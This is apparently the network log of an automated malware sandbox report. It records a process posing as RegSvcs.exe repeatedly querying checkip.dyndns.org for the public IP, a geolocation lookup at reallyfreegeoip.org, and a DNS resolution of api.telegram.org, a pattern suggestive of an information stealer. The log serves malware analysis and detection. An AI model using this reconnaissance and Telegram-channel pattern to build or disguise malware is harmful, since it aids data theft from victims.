                                                                                                              Jan 10, 2025 23:19:42.819336891 CET1.1.1.1192.168.2.60x5d31No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                              • reallyfreegeoip.org
                                                                                                              • api.telegram.org
                                                                                                              • checkip.dyndns.org
                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              0192.168.2.649716132.226.247.73801672C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Jan 10, 2025 23:19:16.084886074 CET151OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Connection: Keep-Alive
                                                                                                              Jan 10, 2025 23:19:16.757812023 CET273INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 10 Jan 2025 22:19:16 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 104
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                              Jan 10, 2025 23:19:16.762742996 CET127OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Jan 10, 2025 23:19:16.972708941 CET273INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 10 Jan 2025 22:19:16 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 104
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                              Jan 10, 2025 23:19:17.741214991 CET127OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Jan 10, 2025 23:19:17.949717045 CET273INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 10 Jan 2025 22:19:17 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 104
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              1192.168.2.649734132.226.247.73801672C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Jan 10, 2025 23:19:18.698031902 CET127OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Jan 10, 2025 23:19:19.403620005 CET273INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 10 Jan 2025 22:19:19 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 104
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              2192.168.2.649746132.226.247.73801672C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Jan 10, 2025 23:19:20.076575041 CET151OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Connection: Keep-Alive
                                                                                                              Jan 10, 2025 23:19:20.768685102 CET273INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 10 Jan 2025 22:19:20 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 104
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              3192.168.2.649756132.226.247.73801672C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Jan 10, 2025 23:19:21.408927917 CET151OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Connection: Keep-Alive
                                                                                                              Jan 10, 2025 23:19:22.123766899 CET273INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 10 Jan 2025 22:19:22 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 104
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              4192.168.2.649765132.226.247.73801672C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Jan 10, 2025 23:19:22.787517071 CET151OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Connection: Keep-Alive
                                                                                                              Jan 10, 2025 23:19:23.523907900 CET273INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 10 Jan 2025 22:19:23 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 104
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              5192.168.2.649777132.226.247.73801672C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Jan 10, 2025 23:19:24.185946941 CET151OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Connection: Keep-Alive
                                                                                                              Jan 10, 2025 23:19:24.873136997 CET273INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 10 Jan 2025 22:19:24 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 104
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              6192.168.2.649790132.226.247.7380
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Jan 10, 2025 23:19:25.544445992 CET151OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Connection: Keep-Alive
                                                                                                              Jan 10, 2025 23:19:26.244102955 CET273INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 10 Jan 2025 22:19:26 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 104
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              7192.168.2.649800132.226.247.73801672C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Jan 10, 2025 23:19:26.890674114 CET151OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Connection: Keep-Alive
                                                                                                              Jan 10, 2025 23:19:27.570959091 CET273INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 10 Jan 2025 22:19:27 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 104
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              8192.168.2.649826132.226.247.73807076C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Jan 10, 2025 23:19:31.133126020 CET151OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Connection: Keep-Alive
                                                                                                              Jan 10, 2025 23:19:31.804013014 CET273INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 10 Jan 2025 22:19:31 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 104
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                              Jan 10, 2025 23:19:31.807331085 CET127OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Jan 10, 2025 23:19:32.016213894 CET273INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 10 Jan 2025 22:19:31 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 104
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                              Jan 10, 2025 23:19:32.716073990 CET127OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Jan 10, 2025 23:19:32.949526072 CET273INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 10 Jan 2025 22:19:32 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 104
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              9192.168.2.649845132.226.247.73807076C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Jan 10, 2025 23:19:33.608896017 CET127OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Jan 10, 2025 23:19:34.301940918 CET273INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 10 Jan 2025 22:19:34 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 104
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              10192.168.2.649856132.226.247.73807076C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Jan 10, 2025 23:19:34.921372890 CET151OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Connection: Keep-Alive
                                                                                                              Jan 10, 2025 23:19:35.617870092 CET273INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 10 Jan 2025 22:19:35 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 104
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              11192.168.2.649868132.226.247.73807076C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Jan 10, 2025 23:19:36.266180992 CET151OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Connection: Keep-Alive
                                                                                                              Jan 10, 2025 23:19:36.947066069 CET273INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 10 Jan 2025 22:19:36 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 104
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              12192.168.2.649877132.226.247.73807076C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Jan 10, 2025 23:19:37.578123093 CET151OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Connection: Keep-Alive
                                                                                                              Jan 10, 2025 23:19:38.259926081 CET273INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 10 Jan 2025 22:19:38 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 104
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              13192.168.2.649888132.226.247.73807076C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Jan 10, 2025 23:19:38.895000935 CET151OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Connection: Keep-Alive
                                                                                                              Jan 10, 2025 23:19:39.574192047 CET273INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 10 Jan 2025 22:19:39 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 104
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              14192.168.2.661846132.226.247.73807076C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Jan 10, 2025 23:19:40.201100111 CET151OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Connection: Keep-Alive
                                                                                                              Jan 10, 2025 23:19:40.899538040 CET273INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 10 Jan 2025 22:19:40 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 104
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              15192.168.2.661858132.226.247.73807076C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Jan 10, 2025 23:19:41.511126041 CET151OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Connection: Keep-Alive
                                                                                                              Jan 10, 2025 23:19:42.203093052 CET273INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 10 Jan 2025 22:19:42 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 104
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              0192.168.2.649722104.21.32.14431672C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-10 22:19:17 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                              Host: reallyfreegeoip.org
                                                                                                              Connection: Keep-Alive
                                                                                                              2025-01-10 22:19:17 UTC854INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 10 Jan 2025 22:19:17 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 362
                                                                                                              Connection: close
                                                                                                              Age: 1862346
                                                                                                              Cache-Control: max-age=31536000
                                                                                                              cf-cache-status: HIT
                                                                                                              last-modified: Fri, 20 Dec 2024 09:00:10 GMT
